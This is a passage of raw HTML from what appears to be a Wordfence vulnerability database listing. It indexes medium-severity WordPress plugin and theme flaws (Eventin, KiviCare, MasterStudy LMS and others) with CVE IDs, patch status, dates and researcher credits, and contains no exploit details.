		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/948d3d24-f596-4ef3-936b-d68219826942" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/383309cc-d890-4ea6-9e77-5297fd631035" target="_blank" rel="noopener">Eventin &lt;= 4.1.20 &#8211; Authenticated (Contributor+) Insecure Direct Object Reference to Arbitrary Event Modification, Deletion and Ownership Takeover</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13169" target="_blank" rel="noopener noreferrer">							CVE-2026-13169						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9ce567c2aebe49665baff705399d2e66.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9ce567c2aebe49665baff705399d2e66"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener">Meher Sudhakar Abbireddi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/383309cc-d890-4ea6-9e77-5297fd631035" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a2e2bd61-3187-4992-a3ae-1b5d88d1b90f" target="_blank" rel="noopener">Eventin &lt;= 4.1.20 &#8211; Authenticated (Contributor+) Insecure Direct Object Reference to Speaker Account Deletion</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13174" target="_blank" rel="noopener noreferrer">							CVE-2026-13174						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3bfe6fa6dcd46d4fe2d2e08ff44bcd5d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bfe6fa6dcd46d4fe2d2e08ff44bcd5d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a2e2bd61-3187-4992-a3ae-1b5d88d1b90f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a298955e-c8e2-4732-a38e-4f7338a088bc" target="_blank" rel="noopener">Eventin &lt;= 4.1.20 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13173" target="_blank" rel="noopener noreferrer">							CVE-2026-13173						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9ce567c2aebe49665baff705399d2e66.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9ce567c2aebe49665baff705399d2e66"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener">Meher Sudhakar Abbireddi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a298955e-c8e2-4732-a38e-4f7338a088bc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/69911634-1281-487c-87f1-37f6e4b016c9" target="_blank" rel="noopener">Greenshift &lt;= 12.8.9 &#8211; Authenticated (Contributor+) Theme Settings Modification via &#8216;gspb_update_global_wp_settings&#8217;</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5093" target="_blank" rel="noopener noreferrer">							CVE-2026-5093						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/greenshift-animation-and-page-builder-blocks" target="_blank" rel="noopener">Greenshift – animation and page builder blocks</a> <span class="wfvr-software-slug">[greenshift-animation-and-page-builder-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/raihan-adi-arba" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4ec0c0cb5a29433b50ba16bb2ecf5537.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ec0c0cb5a29433b50ba16bb2ecf5537"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/raihan-adi-arba" target="_blank" rel="noopener">Raihan Adi Arba</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/69911634-1281-487c-87f1-37f6e4b016c9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d49b404f-4683-410b-884e-2c11218a3204" target="_blank" rel="noopener">GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor &lt;= 2.4.15 &#8211; Authenticated (Contributor+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19699" target="_blank" rel="noopener noreferrer">							CVE-2026-19699						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutenkit-blocks-addon" target="_blank" rel="noopener">GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor</a> <span class="wfvr-software-slug">[gutenkit-blocks-addon]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d49b404f-4683-410b-884e-2c11218a3204" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/88b4791e-8c48-446e-b713-8958d60f668f" target="_blank" rel="noopener">HashBar – Announcement, Notification Bar &amp; Popup Campaign &lt;= 2.0.0 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66602" target="_blank" rel="noopener noreferrer">							CVE-2026-66602						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hashbar-wp-notification-bar" target="_blank" rel="noopener">HashBar – Announcement, Notification Bar &amp; Popup Campaign</a> <span class="wfvr-software-slug">[hashbar-wp-notification-bar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/brian-willows" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/22d12b4c44e574b32a29d063142b8954.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="22d12b4c44e574b32a29d063142b8954"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/brian-willows" target="_blank" rel="noopener">Brian Willows</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/88b4791e-8c48-446e-b713-8958d60f668f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1891a8b7-3c70-4be1-80e1-fdc787261cbd" target="_blank" rel="noopener">Homlisti &lt;= 3.1.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66647" target="_blank" rel="noopener noreferrer">							CVE-2026-66647						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/UNKNOWN-CVE-2026-66647" target="_blank" rel="noopener">Homlisti</a> <span class="wfvr-software-slug">[homlisti]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener">Tran Nguyen Bao Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1891a8b7-3c70-4be1-80e1-fdc787261cbd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6315e218-c547-4d10-b26c-9a9f4a70f8ba" target="_blank" rel="noopener">KiviCare – Clinic &amp; Patient Management System (EHR) &lt; 4.5.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19416" target="_blank" rel="noopener noreferrer">							CVE-2026-19416						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kivicare-clinic-management-system" target="_blank" rel="noopener">KiviCare – Clinic &amp; Patient Management System (EHR)</a> <span class="wfvr-software-slug">[kivicare-clinic-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6315e218-c547-4d10-b26c-9a9f4a70f8ba" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d2c0be66-b2e9-4afd-a804-cc432b3fc694" target="_blank" rel="noopener">KiviCare – Clinic &amp; Patient Management System (EHR) &lt; 4.5.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19417" target="_blank" rel="noopener noreferrer">							CVE-2026-19417						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kivicare-clinic-management-system" target="_blank" rel="noopener">KiviCare – Clinic &amp; Patient Management System (EHR)</a> <span class="wfvr-software-slug">[kivicare-clinic-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d2c0be66-b2e9-4afd-a804-cc432b3fc694" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/685408e9-7e32-4e48-8517-cefa1d33c4fc" target="_blank" rel="noopener">Leyka &lt;= 3.32.3 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66677" target="_blank" rel="noopener noreferrer">							CVE-2026-66677						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/leyka" target="_blank" rel="noopener">Leyka</a> <span class="wfvr-software-slug">[leyka]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/685408e9-7e32-4e48-8517-cefa1d33c4fc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8a3138b3-9a20-43f6-9697-4c0e524b4964" target="_blank" rel="noopener">Manual Image Crop &lt; 1.15 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15384" target="_blank" rel="noopener noreferrer">							CVE-2026-15384						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/manual-image-crop" target="_blank" rel="noopener">Manual Image Crop</a> <span class="wfvr-software-slug">[manual-image-crop]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c1848da8ace36e65db046cca318ee343.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c1848da8ace36e65db046cca318ee343"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener">Shivamani Vastrala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8a3138b3-9a20-43f6-9697-4c0e524b4964" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/834c6a56-7b02-4f5d-9e10-94ba7da6d47e" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education &lt;= 3.7.41 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73404" target="_blank" rel="noopener noreferrer">							CVE-2026-73404						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/masterstudy-lms-learning-management-system" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education</a> <span class="wfvr-software-slug">[masterstudy-lms-learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/834c6a56-7b02-4f5d-9e10-94ba7da6d47e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6741a049-1b89-4458-86e6-aabf83915b3a" target="_blank" rel="noopener">Modal Survey &#8211; WordPress Poll, Survey &amp; Quiz Plugin &lt;= 2.0.2.2.3 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66634" target="_blank" rel="noopener noreferrer">							CVE-2026-66634						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/modal-survey" target="_blank" rel="noopener">Modal Survey &#8211; WordPress Poll, Survey &amp; Quiz Plugin</a> <span class="wfvr-software-slug">[modal-survey]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener">luc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6741a049-1b89-4458-86e6-aabf83915b3a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/492daa1b-e508-40a0-ad4f-1f1d6469d68f" target="_blank" rel="noopener">MWB HubSpot for WooCommerce – CRM, Abandoned Cart, Email Marketing, Marketing Automation &amp; Analytics &lt;= 1.6.7 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73396" target="_blank" rel="noopener noreferrer">							CVE-2026-73396						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/makewebbetter-hubspot-for-woocommerce" target="_blank" rel="noopener">MWB HubSpot for WooCommerce – CRM, Abandoned Cart, Email Marketing, Marketing Automation &amp; Analytics</a> <span class="wfvr-software-slug">[makewebbetter-hubspot-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
